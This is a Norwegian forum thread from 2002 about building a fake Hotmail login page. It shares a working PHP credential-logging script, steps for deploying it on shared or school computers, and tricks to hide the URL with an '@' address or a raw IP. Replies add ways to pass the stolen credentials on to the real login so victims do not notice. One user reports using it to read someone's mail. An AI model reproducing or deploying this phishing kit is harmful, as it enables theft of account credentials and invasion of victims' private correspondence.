Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  17 1972
Pesta kommer
Zpeef's Avatar
Laget et lite script som logger username og passwords som blir skrevet inn fra en falsk side.

http://www.hotmail.com@home.no.net/h...otmail/msn.htm

Det som blir skrevet inn der havner på:
http://home.no.net/hovli/hotmail/lp.htm

Filkodene:

Theft.php

----------------------------------------------
<?
$lp = fopen("lp.htm", "a"); //the log file

fwrite($lp, "<b>Login:</b> $login <br> <b>Password:</b> $passwd <br><br>
"
);

?>

<script>
window.location="http://www.hotmail.com"
</script>
----------------------------------------------

Så må du lagre www.hotmail.com, og forandre på password form til:
<FORM name=passwordform action=theft.php method=post target=_top>

Så uploader du alt dette til en side som støtter php, og setter chmod 777 på lp.htm.

Deretter finner du noen pcer som har flere brukere, etc. og setter http://www.hotmail.com@dinurl/til/ho...html/filen.htm som startside. Eller så kan du logge deg inn på den siden, og viske bort alt i adresselinjen, og skrive http://www.hotmail.com/ som adresse, uten å trykke enter eller noe.

Hvis noen idioter som har hotmail ser dette, så kan det godt være de kommer på "aha! jeg tror jeg skjekker mailen min!" Når de så ser theft.php, hvis de rekker det i det hele da, så er det uansett for sent, og du kan kose deg

Bruk på egen risk.

Dette er nok ikke den beste måten, men dette er slik jeg gjorde det.
Tørr jeg gjette på hvor du fikk denne ideen fra? hehe..

Scha
Pesta kommer
Zpeef's Avatar
Trådstarter
Hvor faen ble det av vedlegget? Jaja her er det
Pesta kommer
Zpeef's Avatar
Trådstarter
Scha: www.astalavista.com
Men leste også i den BVP om det der med å sette som starteside på skolen. Smart
Better than thou.
Pass på å forwarde info'en til scriptet til msn som sender dem til inbox'en. Tar MYE lengre tid før du blir merka da.
Pesta kommer
Zpeef's Avatar
Trådstarter
har hørt om det ja, men jeg vet ikke hvordan jeg gjør det.
Better than thou.
Sett et form med de variablene du tok imot i value feltene og få det til å execute etter 0 sekunder.
eller:

<?php

Header("Location: hotmail.com/wherever.fuck?login=$login&passwd=$passwd");

?>

Scha
Better than thou.
Ja, eller det. Tenkte ikke på querystring. ;]
takker for kult script.. testa det og funket kult

leste nettopp noen hotmails til en dude, og skaffet meg noen pass! )
Pesta kommer
Zpeef's Avatar
Trådstarter
en ting til... IKKE bruk eksempelt mitt til å lure folk.. vil liksom ikke bli busta eller noe..
improbable
Gusto's Avatar
DonorAdministrator
og istedenfor å bruke home.no.net url bør du heller bruke ip'en til siden. da er det mindre sjanse for at folk skal merke @'en og urlen.
feeett

Ja, gusto's right... alt for mistenkelig
det var noen jævlige bilder du hadde på den sida
0 takk til deg.
mongob0ffel's Avatar
aaargggghhh så jævlig!!!!!!

tøft script tho
STRIP TAGS FFS #%"#%"#

EKLE BILDER#"%
Pesta kommer
Zpeef's Avatar
Trådstarter
hehe jeg gidder ikke mekke på det, sånn at de som bruker html tags som passord ikke fucker opp lp.htm siden
▼ ... over en måned senere ... ▼
Pesta kommer
Zpeef's Avatar
Trådstarter
Ville bare si at koden er oppdatert slik at når man nå prøver å logge inn på "fake"siden, blir man faktisk logget inn også.


<?
$lp = fopen("lp.htm", "a");

fwrite($lp, "<b>Login:</b> $login <br> <b>Password:</b> $passwd <br><br>
"
);

?>
<script>
window.location="https://loginnet.passport.com/ppsecure/post.srf?login=<? echo $login ; ?>@hotmail.com&passwd=<? echo $passwd ;?>&svc=mail&RemoteDAPost=https://login.msnia.passport.com/ppsecure/post.asp"
</script>
Sist endret av Zpeef; 24. juli 2002 kl. 13:43.